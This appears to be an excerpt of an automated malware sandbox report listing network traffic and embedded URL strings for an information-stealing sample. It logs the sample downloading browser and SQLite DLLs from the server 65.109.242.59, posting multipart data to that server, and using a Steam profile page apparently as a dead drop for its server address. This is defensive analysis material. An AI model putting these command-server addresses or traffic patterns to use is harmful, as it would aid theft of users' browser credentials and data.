                  Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKFHCFIECAAAKEGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                  Source: RegAsm.exe, 00000001.00000002.2534193240.000000001925D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2527728360.00000000132B7000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://65.109.242.59
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/freebl3.dll
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dll
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/mozglue.dllk
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/msvcp140.dll
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/nss3.dll
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/softokn3.dll
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.0000000001132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/sqls.dll
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59/vcruntime140.dll
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59GIDA
                  Source: RegAsm.exe, 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://65.109.242.59JDGC
                  Source: IJECAE.1.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                  Source: IJECAE.1.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: IJECAE.1.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: IJECAE.1.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&am
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=en
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englis
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engli
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                  Source: RegAsm.exe, 00000001.00000002.2526755030.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, DHDHCG.1.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                  Source: IJECAE.1.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: IJECAE.1.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: IJECAE.1.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://help.steampowered.com/en/
                  Source: DHDHCG.1.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://mozilla.org0/
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/discussions/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/market/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                  Source: file.exe, 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2526755030.0000000001132000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899W
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://steamcommunity.com/workshop/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.0000000001132000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/~fRct
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/
                  Source: 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/about/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/explore/
                  Source: RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/legal/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/mobile
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/news/
                  Source: RegAsm.exe, 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2526755030.000000000116E000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.1.drString found in binary or memory: https://store.steampowered.com/points/shop/
